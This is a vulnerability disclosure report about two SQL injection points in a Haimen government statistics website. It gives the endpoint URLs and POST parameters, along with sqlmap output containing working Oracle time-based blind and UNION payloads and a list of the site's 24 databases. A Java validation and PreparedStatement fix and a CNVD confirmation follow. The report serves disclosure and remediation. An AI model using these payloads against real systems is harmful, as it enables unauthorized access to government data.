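2015-07-02: Details reported to the vendor; awaiting vendor handling
2015-07-06: Vendor confirmed; details disclosed to the vendor only
2015-07-16: Details disclosed to core white hats and experts in the relevant fields
2015-07-26: Details disclosed to regular white hats
2015-08-05: Details disclosed to intern white hats
2015-08-20: Details disclosed to the public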
As the title says.
Two SQL injection points. The first:
http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=index
POST parameters: change=0&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
The ndSearchEnd parameter is injectable.
The second:
http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=index
POST parameters: change=0&dqlx=hms&fid=F737524D35DF4F0AA3AE2D142FBE0CFC&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=24&pageEnd=0&sblx=jd&sblxsc=nd
The ndSearchEnd parameter is injectable.
Proof with sqlmap:
sqlmap identified the following injection points with a total of 1231 HTTP(s) requests:
---
Parameter: ndSearchEnd (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
    Vector: UNION ALL SELECT [QUERY],NULL FROM DUAL--
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'HMDATA'
current schema (equivalent to database on Oracle): 'HMDATA'
current user is DBA: True
available databases [24]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HMDATA
[*] HMDATA_TEST
[*] HR
[*] IX
[*] MDSYS
[*] NTDATA
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB

Database: HMDATA
[36 tables]
Filter the parameters.
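
One way to apply that fix in a JSP/Java back end, as an added example that is not part of the report and not the affected site's code: validate ndSearchStart/ndSearchEnd and zbid strictly, then bind them with a PreparedStatement. The table and column names, the 4-digit year format, and the reading of -1 as "no bound" are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Added example. Table and column names (stat_data, zbid, nd, val) are hypothetical.
public class YearRangeQuery {
    // Assumption: ndSearchStart/ndSearchEnd are 4-digit years, -1 or empty = no bound.
    private static final Pattern YEAR = Pattern.compile("-1|\\d{4}");
    // The zbid value in the report is 32 upper-case hex characters.
    private static final Pattern ID = Pattern.compile("[0-9A-F]{32}");

    /** Returns null for "no bound"; throws on anything that is not a plain year. */
    static Integer parseYear(String raw) {
        if (raw == null || raw.isEmpty()) return null;
        if (!YEAR.matcher(raw).matches())
            throw new IllegalArgumentException("invalid year parameter");
        int year = Integer.parseInt(raw);
        return year == -1 ? null : year;
    }

    static String parseId(String raw) {
        if (raw == null || !ID.matcher(raw).matches())
            throw new IllegalArgumentException("invalid id parameter");
        return raw;
    }

    /** Validates first, then binds every value; input never becomes SQL text. */
    static PreparedStatement build(Connection c, String zbid, String start, String end)
            throws SQLException {
        String id = parseId(zbid);
        Integer lo = parseYear(start), hi = parseYear(end);
        PreparedStatement ps = c.prepareStatement(
            "SELECT nd, val FROM stat_data WHERE zbid = ? AND nd BETWEEN ? AND ?");
        ps.setString(1, id);
        ps.setInt(2, lo == null ? 0 : lo);
        ps.setInt(3, hi == null ? 9999 : hi);
        return ps;
    }

    public static void main(String[] args) {
        System.out.println(parseYear("2014"));
        System.out.println(parseYear("-1")); // sentinel seen in the report's requests
        try {
            parseYear("-1' AND 'WEbm' LIKE 'WEbm"); // quote-bearing value from the report
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The sqlmap output also reports the application account as DBA, so running the application under a least-privilege Oracle account limits what any remaining injection can reach.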
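Severity: High
Vulnerability Rank: 10
Confirmed: 2015-07-06 18:52
CNVD confirmed and reproduced the issue described, and has passed it to CNCERT for dispatch to the Jiangsu branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet.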